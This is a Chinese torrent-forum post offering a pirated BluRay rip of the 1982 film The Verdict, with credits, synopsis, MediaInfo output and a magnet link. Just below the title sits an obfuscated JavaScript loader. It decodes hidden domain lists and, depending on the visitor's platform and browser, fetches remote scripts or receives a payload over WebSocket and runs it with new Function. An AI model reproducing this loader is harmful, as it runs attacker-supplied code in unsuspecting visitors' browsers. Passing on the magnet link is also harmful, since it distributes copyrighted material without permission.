大审判[中文字幕]The.Verdict.1982.1080p.BluRay.DTS.x265-10bit-迅雷下载 9.52GB

版主小s 16天前 233

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 大审判

◎片 名 The Verdict

◎年 代 1982

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 1982-12-08

◎IMDb链接 https://www.imdb.com/title/tt0084855/

◎豆瓣评分 7.4/10 (1531人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300725/

◎片 长 129 分钟

◎导 演 西德尼·吕美特 Sidney Lumet (id:1010627)

◎编 剧 大卫·马梅 David Mamet (id:1036481)

◎演 员 保罗·纽曼 Paul Newman (id:1054516)

夏洛特·兰普林 Charlotte Rampling (id:1007020)

杰克·瓦尔登 Jack Warden (id:1049751)

詹姆斯·梅森 James Mason (id:1048155)

托宾·贝尔 Tobin Bell (id:1025219)

伯特·哈里斯 Burtt Harris (id:1286095)

爱德华·宾斯 Edward Binns (id:1066678)

伯特·哈里斯 Burtt Harris (id:1286095)

安德泽·巴特科维卡 Andrzej Bartkowiak (id:1276546)

Peter C. Frank Peter C. Frank (id:1284088)

老乔治·德蒂塔 George DeTitta Sr. (id:1282304)

John Kasarda John Kasarda (id:1288158)

Edward Pisoni Edward Pisoni (id:1294578)

伯特·哈里斯 Burtt Harris (id:1286095)

◎标 签 法律 / 美国 / 1982 / PaulNewman / 剧情 / 美国电影 / 保罗·纽曼 / SidneyLumet

◎简 介

弗兰克(保罗·纽曼 Paul Newman 饰)是一名律师,职业之外,他唯一的爱好就是喝酒,然而喝酒误事,导致弗兰克的业界名声一路走低。为了挽回声誉,弗兰克的朋友米基(杰克·瓦尔登 Jack Warden 饰)给他介绍了一宗大案,一名女子在教会医院中由于医疗事故而陷入了昏迷,弗兰克要帮助女子向医院讨回公道。

对于弗兰克来说,这是一桩难得的好差事,因为他只需要和被告达成庭外和解,就可以有不菲的赔偿金纳入囊中,可是,当他逐渐开始了解整个事件的来龙去脉之后,心中油然而生的正义感令他决定将这起事故追究到底。一边是弗兰克势单力薄,一边是有大企业撑腰的辩方律师,这场官司会迎来怎样的结局呢?

◎获奖情况 (共5项)

第55届奥斯卡金像奖 (1983)

最佳影片(提名)

└──理查德·D·扎努克 (id:1036816)

└──大卫·布朗 (id:1071554)

最佳导演(提名)

└──西德尼·吕美特 (id:1010627)

最佳男主角(提名)

└──保罗·纽曼 (id:1054516)

最佳男配角(提名)

└──詹姆斯·梅森 (id:1048155)

最佳改编剧本(提名)

└──大卫·马梅 (id:1036481)

  1. General

  2. Unique ID : 261035064264023600510117076864855103029 (0xC46186516F95FC713257F2D9C452D635)

  3. Complete name : [email protected]v

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.52 GiB

  7. Duration : 2 h 8 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 10.6 Mb/s

  10. Movie name : The Verdict 1982 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-07-14 16:22:18

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 8 min

  21. Bit rate : 8 115 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.169

  31. Stream size : 7.31 GiB (77%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 2 h 8 min

  43. Bit rate mode : Variable

  44. Bit rate : 2 434 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossless

  51. Stream size : 2.19 GiB (23%)

  52. Title : English

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 2 h 4 min

  63. Bit rate : 31.8 kb/s

  64. Count of elements : 2800

  65. Stream size : 28.3 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:3B85ECBD67ADAD0BB24FB4E66D27E8E41F450D4F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回